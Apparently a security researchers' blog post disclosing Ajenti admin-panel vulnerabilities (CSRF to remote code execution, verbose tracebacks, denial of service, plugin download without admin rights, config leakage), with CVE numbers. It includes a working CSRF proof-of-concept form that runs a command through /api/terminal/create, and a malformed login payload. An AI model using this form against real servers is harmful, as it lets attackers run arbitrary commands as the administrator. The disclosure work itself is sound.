Security Issues on Ajenti.


Researching the platform, me, Edward Amaral and my coworker Daniel Chactoura, security researchers from Stone Payments found some security issues on the Admin panel by Ajenti.

Those Vulnerabilities were:

  • Multiple CSRF with Remote Code Execution
  • Inproper Error Handling
  • Denial of Service
  • Security Misconfiguration

CSRF With RCE

The CSRF was the first thing that we were looking for in the platform. because in tools like that, authentication bypass and CRSFs are the vulnerabilities that has the higher level of severity.

Well, let’s explain what we’ve done.

The CSRF occoured in several requisitions, we will explain the https://<IP>/api/terminal/create path.

With this CSRF we can make the admin of the server execute any command we want.

We created the code below to make the PoC . It creates a directory named Test=CSRF_PoC in the Desktop of the server.

<html>

<body>

<script>history.pushState(‘’, ‘’, ‘/’)</script>

<form action=”https://172.16.3.117:8000/api/terminal/create" method=”POST” enctype=”text/plain”>

<inpAs being a admin onlyut type=”hidden” name=”&#123;&quot;command&quot;&#58;&quot;mkdir&#32;&#47;home&#47;edward&#47;Desktop&#47;Test” value=”CSRF_POC&quot;&#44;&quot;autoclose&quot;&#58;&quot;true&quot;}” />

<input type=”submit” value=”Submit request” />

</form>

</body>

</html>

Improper Error Handling

There’s a traceback error that occours when the request sends a malformed JSON as data to the login requisition. With that JSON the server responds with paths related to the server machine .

The JSON sent was {“username”:”User”,”password”:”P4ssw0rd”,”mode”:”normal”}=-

The equal sign that makes the JSON malformed, and forces the server to respond with an error message that show the path related to the tool on the server.

Denial Of Service

This attack was found on the Get information requisition. We found that by changing the name of the sensor, the server responds with its name, and the string does not have any size control. When we saw that, the first thing that comes to mind is to Flood the server with a GIANT string, and that’s what we’ve done. The server frooze as it was expected.

Security Misconfiguration

On the second day of testing we were testing the permissions of the tool, as it’s expected, the application has several features that are only useable if you have superuser privledges on the tool,

And we found that we can make the requisition of downloading the application plugins without being an admin of the server. That gains a lot of severity points because it can download a plugin that has a known vulnerability, to gain access to the server machine.

Requisition done as user, and it’s response

Research Update.

After further researching on the platform, me, Lucas Carmo, found another issue, that causes an information disclosure.

While conducting a vulnerability research on the application, i’ve started a code enumeration to understand how the application works. With this, I identified an information disclosure in the source code of the login page, that returns valuable information such as: operational system of the server, and the username of the Super user registered by the administrator of the server(super users are users that are allowed to use sudo command). Studying the application, i saw that this information comes from the /etc/ajenti/config.yml and this is imported by the angularJS on source code.

The source Code:

<script>
angular.module(‘core’).constant(‘urlPrefix’, ‘’);
angular.module(‘core’).constant(‘ajentiPlugins’, {“core”: “Core”, “ace”: “Ace editor”, “settings”: “Settings”, “passwd”: “User DB API”, “notepad”: “Notepad”, “plugins”: “Plugins”, “filemanager”: “File Manager”, “terminal”: “Terminal”, “dashboard”: “Dashboard”, “filesystem”: “Filesystem API”, “services”: “Services”, “packages”: “Packages”});
angular.module(‘core’).constant(‘initialConfigContent’, {“ssl”: {“client_auth”: {“certificates”: [], “enable”: false, “force”: false}, “enable”: false, “certificate”: null}, “max_sessions”: 9, “name”: “ubuntu”, “language”: “en”, “color”: “default”, “bind”: {“host”: “0.0.0.0”, “mode”: “tcp”, “port”: 8000}, “auth”: {“allow_sudo”: true, “emails”: {}, “provider”: “os”}, “restricted_user”: “root”});
angular.module(‘core’).constant(‘ajentiPlatform’, ‘debian’);
angular.module(‘core’).constant(‘ajentiPlatformUnmapped’, ‘ubuntu’);
angular.module(‘core’).constant(‘ajentiVersion’, ‘2.1.24’);
angular.module(‘core’).constant(‘ajentiBootstrapColor’, ‘default’);

angular.element(document).ready(ajentiBootstrap);
</script>

Source code showing private information

CVES related to that issues:

  • CVE-2018–1000080
  • CVE-2018–1000081
  • CVE-2018–1000082
  • CVE-2018–1000083
  • CVE-2018–1000126

stolabs

STO Labs

Edward Amaral Toledano

Written by

Security researcher at STOlabs

stolabs

stolabs

STO Labs

More From Medium

More on Security from stolabs

More on Vulnerability from stolabs

More on Vulnerability from stolabs

Stored XSS + Session Hijacking

Jan 24 · 3 min read

2

Related reads

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade